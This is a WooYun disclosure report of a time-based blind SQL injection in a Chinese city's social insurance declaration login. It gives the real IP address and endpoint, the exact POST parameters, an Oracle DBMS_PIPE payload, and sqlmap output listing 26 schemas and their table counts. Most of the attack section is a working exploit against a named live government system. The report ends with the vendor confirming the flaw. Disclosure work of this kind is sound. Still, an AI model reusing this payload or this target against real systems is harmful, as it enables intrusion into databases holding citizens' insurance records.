Vulnerability summary

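Defect ID: wooyun-2015-0112959

Vulnerability title: POST injection in a city's social insurance declaration system

Related vendor: 广东省信息安全测评中心 (Guangdong Information Security Evaluation Center)

Vulnerability author: Yang

Submitted: 2015-05-18 17:30

Fixed: 2015-07-03 16:24

Made public: 2015-07-03 16:24

Vulnerability type: SQL injection vulnerability

Severity: High

Self-assessed rank: 11

Vulnerability status: handed over to a third-party partner organization (广东省信息安全测评中心) for handling

Vulnerability source: http://www.wooyun.org; for questions or help, contact [email protected]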


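Vulnerability details

Disclosure status:

2015-05-18: Details reported to the vendor; awaiting vendor handling
2015-05-19: Vendor confirmed; details disclosed to the vendor only
2015-05-29: Details disclosed to core white hats and experts in related fields
2015-06-08: Details disclosed to regular white hats
2015-06-18: Details disclosed to intern white hats
2015-07-03: Details disclosed to the public

Brief description:

POST injection in a city's social insurance declaration system

Detailed description: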

http://113.106.218.163:8001/grcx/action/LoginAction (POST)
UserType=4&DWSXH=88952634&GMSFHM=88952634&ZSXM=88952634&Password=88952634&imagecheck=88952634&SZDW=88952634&UserID=88952634

[Screenshot: 1.png]

sqlmap identified the following injection points with a total of 1765 HTTP(s) requests:
---
Parameter: UserID (POST)
Type: AND/OR time-based blind
Title: Oracle AND time-based blind
Payload: UserType=4&DWSXH=88952634&GMSFHM=88952634&ZSXM=88952634&Password=88952634&imagecheck=88952634&SZDW=88952634&UserID=88952634' AND 1805=DBMS_PIPE.RECEIVE_MESSAGE(CHR(83)||CHR(80)||CHR(110)||CHR(107),5) AND 'dgZI'='dgZI
---
web application technology: JSP
back-end DBMS: Oracle
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: UserID (POST)
Type: AND/OR time-based blind
Title: Oracle AND time-based blind
Payload: UserType=4&DWSXH=88952634&GMSFHM=88952634&ZSXM=88952634&Password=88952634&imagecheck=88952634&SZDW=88952634&UserID=88952634' AND 1805=DBMS_PIPE.RECEIVE_MESSAGE(CHR(83)||CHR(80)||CHR(110)||CHR(107),5) AND 'dgZI'='dgZI
---
web application technology: JSP
back-end DBMS: Oracle
available databases [26]:
[*] "CTXSYS\X03"
[*] "H`WSSB"
[*] "HR\X11"
[*] "OE\T"
[*] "QS_WS\X03"
[*] "XDY\X02"
[*] HZWSSB_CS
[*] MDSYS
[*] ODM
[*] OEM_MTR
[*] OLAPSYS
[*] ORDSYS
[*] OUTLN
[*] PM
[*] QS
[*] QS_aS
[*] QS_CBADM
[*] QS_CS
[*] QS_ES
[*] RMAN
[*] SCOTT
[*] SH
[*] SYS
[*] SYSTEM
[*] WKSYS
[*] WMSYS


[*] "CTXSYS"
[*] "H`WSSB"
[*] "HR"
[*] "OE "
[*] "QS_WS"
[*] "XDY"
[*] HZWSSB_CS
[*] MDSYS
[*] ODM
[*] OEM_MTR
[*] OLAPSYS
[*] ORDSYS
[*] OUTLN
[*] PM
[*] QS
[*] QS_aS
[*] QS_CBADM
[*] QS_CS
[*] QS_ES
[*] RMAN
[*] SCOTT
[*] SH
[*] SYS
[*] SYSTEM
[*] WKSYS
[*] WMSYS
Database: WKSYS
+-----------------------------+---------+
| Table | Entries |
+-----------------------------+---------+
| WK$CHARSET | 57 |
| WK$MIMETYPES | 35 |
| WK$LANG | 14 |
| WK$SYS_CONFIG | 1 |
+-----------------------------+---------+
Database: HZWSSB_CS
+-----------------------------+---------+
| Table | Entries |
+-----------------------------+---------+
| S_U_USER_TO_ROLE | 205073 |
| RECV_DETAIL | 21877 |
| RECVSTAT | 6740 |
| SJCJ_YWJL_0424 | 3480 |
| SJCJ_ZHCS | 2755 |
| SJCJ_SCJL | 2630 |
| SJCJ_YWJL_SH | 1925 |
| SENDSTAT | 1200 |
| CSINTERFACELOG | 751 |
| SJCJ_YWJL | 177 |
| SJCJ_SPGZ | 144 |
| SJCJ_TJJL_SH | 122 |
| SYSTAB_DICTIONARY_DATA | 73 |
| S_U_ROLE_TO_RIGHT | 69 |
| SJCJ_GRZL | 62 |
| SYS_CXLBCS | 59 |
| S_U_RIGHT | 57 |
| SYS_GENTBL_CONF | 57 |
| SYS_GENTBL_QUERYSQL | 33 |
| S_R_NOTES | 29 |
| SYS_COMMIT_SQL | 21 |
| SYS_SEQUENCE | 19 |
| T_PH | 18 |
| S_WZM | 16 |
| S_XZSZ | 12 |
| SJCJ_TJJL | 12 |
| SJCJ_MMCSHMX | 11 |
| SJCJ_SCWJ | 11 |
| SJCJ_WSMMBH | 6 |
| S_U_ROLE | 5 |
| SYS_BULLETIN | 3 |
| S_DUAL | 1 |
| S_U_ORG | 1 |
| SYSTAB_DYNDICT | 1 |
+-----------------------------+---------+
Database: QS
+-----------------------------+---------+
| Table | Entries |
+-----------------------------+---------+
| AQ$_AQ$_MEM_MC_S | 1 |
| AQ$_QS_ORDERS_PR_MQTAB_S | 1 |
+-----------------------------+---------+
Database: ORDSYS
+-----------------------------+---------+
| Table | Entries |
+-----------------------------+---------+
| ORD_CARTRIDGE_COMPONENTS | 86 |
| JACCELERATOR$DLLS | 14 |
+-----------------------------+---------+
Database: QS_ES
+-----------------------------+---------+
| Table | Entries |
+-----------------------------+---------+
| AQ$_QS_ES_ORDERS_MQTAB_S | 1 |
| AQ$_QS_ES_ORDERS_PR_MQTAB_S | 1 |
+-----------------------------+---------+
Database: OLAPSYS
+-----------------------------+---------+
| Table | Entries |
+-----------------------------+---------+
| CWM$ITEMUSE | 118 |
| CWM$LEVELATTRIBUTE | 67 |
| CWM$CLASSIFICATIONENTRY | 66 |
| CWM$ITEMMAP | 59 |
| CWM$LEVEL | 27 |
| CWM$CLASSIFICATION | 24 |
| CWM$DIMENSIONATTRIBUTE | 23 |
| CWM$DOMAIN | 21 |
| CWM$FUNCTION | 13 |
| CWM$CLASSIFICATIONTYPE | 10 |
| CWM$OBJECTTYPE | 10 |
| CWM$CUBEDIMENSIONUSE | 7 |
| CWM$FACTLEVELUSE | 7 |
| CWM$DIMENSION | 5 |
| CWM$PARAMETER | 5 |
| CWM$FACTUSE | 4 |
| CWM$FUNCTIONUSE | 4 |
| CWM$MEASURE | 4 |
| CWM$MEASUREDIMENSIONUSE | 4 |
| CWM$MODEL | 3 |
| CWM$PROJECT | 3 |
| CWM$CUBE | 2 |
| CWM$FACTTABLEMAP | 2 |
+-----------------------------+---------+
Database: QS_CS
+-----------------------------+---------+
| Table | Entries |
+-----------------------------+---------+
| AQ$_QS_CS_ORDER_STATUS_QT_S | 1 |
+-----------------------------+---------+
Database: SYSTEM
+-----------------------------+---------+
| Table | Entries |
+-----------------------------+---------+
| HELP | 918 |
| AQ$_QUEUES | 40 |
| REPCAT$_OBJECT_TYPES | 28 |
| REPCAT$_RESOLUTION_METHOD | 19 |
| "LOGMNR_SESSIO\?81$" | 4 |
| REPCAT$_TEMPLATE_STATUS | 3 |
| REPCAT$_AUDIT_ATTRIBUTE | 2 |
| REPCAT$_TEMPLATE_TYPES | 2 |
+-----------------------------+---------+
Database: SH
+-----------------------------+---------+
| Table | Entries |
+-----------------------------+---------+
| SALES | 1016271 |
| COSTS | 787766 |
| FWEEK_PSCAT_SALES_MV | 149325 |
| CUSTOMERS | 50000 |
| PRODUCTS | 10000 |
| TIMES | 1461 |
| PROMOTIONS | 501 |
| CAL_MONTH_SALES_MV | 35 |
| COUNTRIES | 19 |
| CHANNELS | 5 |
+-----------------------------+---------+
Database: SCOTT
+-----------------------------+---------+
| Table | Entries |
+-----------------------------+---------+
| EMP | 14 |
| SALGRADE | 5 |
| DEPT | 4 |
+-----------------------------+---------+
Database: ODM
+-----------------------------+---------+
| Table | Entries |
+-----------------------------+---------+
| ODM_ERROR_TABLE | 342 |
| ODM_CONFIGURATION | 25 |
| ODM_INTERNAL_CONFIGURATION | 19 |
| ODM_PMML_DTD | 1 |
+-----------------------------+---------+
Database: QS_CBADM
+-----------------------------+---------+
| Table | Entries |
+-----------------------------+---------+
| AQ$_QS_CBADM_ORDERS_MQTAB_S | 3 |
+-----------------------------+---------+
Database: RMAN
+-----------------------------+---------+
| Table | Entries |
+-----------------------------+---------+
| CONFIG | 1 |
| RCVER | 1 |
+-----------------------------+---------+
Database: MDSYS
+-----------------------------+---------+
| Table | Entries |
+-----------------------------+---------+
| CS_SRS | 1000 |
| SDO_DATUMS | 118 |
| MD$RELATE | 90 |
| SDO_DIST_UNITS | 54 |
| SDO_AREA_UNITS | 48 |
| SDO_ELLIPSOIDS | 47 |
| SDO_PROJECTIONS | 42 |
| SDO_ANGLE_UNITS | 12 |
+-----------------------------+---------+
Database: WMSYS
+-----------------------------+---------+
| Table | Entries |
+-----------------------------+---------+
| WM$WORKSPACE_PRIV_TABLE | 8 |
| WM$ENV_VARS | 1 |
| WM$VERSION_HIERARCHY_TABLE | 1 |
| WM$WORKSPACES_TABLE | 1 |
+-----------------------------+---------+
Database: PM
+-----------------------------+---------+
| Table | Entries |
+-----------------------------+---------+
| ONLINE_MEDIA | 9 |
| PRINT_MEDIA | 4 |
+-----------------------------+---------+

Proof of vulnerability:

[Screenshot: 1.png]

Remediation:

Copyright notice: when reposting, please credit the source Yang@乌云 (WooYun)


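Vulnerability response

Vendor response:

Severity: High

Vulnerability rank: 10

Confirmed: 2015-05-19 16:22

Vendor reply:

Thank you very much for your report.
The issue in the report has been confirmed and reproduced.
Data affected: high
Attack cost: low
Impact: high
Overall rating: high, rank: 10
We are contacting the organization that manages the website to handle it.

Latest status:

None yet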